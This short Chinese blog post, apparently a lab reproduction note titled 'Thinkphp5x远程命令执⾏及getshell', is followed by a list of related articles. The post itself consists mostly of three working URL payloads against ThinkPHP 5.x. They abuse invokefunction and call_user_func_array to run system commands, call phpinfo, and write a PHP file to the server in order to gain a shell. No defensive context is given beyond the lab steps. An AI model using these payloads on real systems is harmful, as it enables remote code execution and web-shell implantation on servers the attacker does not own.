启动环境查看端口
? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=id
? s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1
? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=echo "<?php phpinfo();?>" >>1.php
访问1.php
Thinkphp5x远程命令执⾏及getshell
2301_815255182024-09-24 12:11
相关推荐
doubt。2 小时前
8.攻防世界Web_php_wrong_nginx_config没有名字的小羊3 小时前
Cyber Security 101-Build Your Cyber Security Career-Security Principles(安全原则)大秦王多鱼5 小时前
Kafka SASL/PLAIN介绍大有数据可视化6 小时前
汽车中控屏HMI界面,安全和便捷是设计的两大准则。泪不是Web妳而流10 小时前
BurpSuite抓包与HTTP基础大秦王多鱼11 小时前
Kafka SSL(TLS)安全协议doubt。12 小时前
3.攻防世界Web_php_unserializedoubt。15 小时前
1.攻防世界easyphp垚垚 Securify 前沿站17 小时前
CVE-2023-38831 漏洞复现:win10 压缩包挂马攻击剖析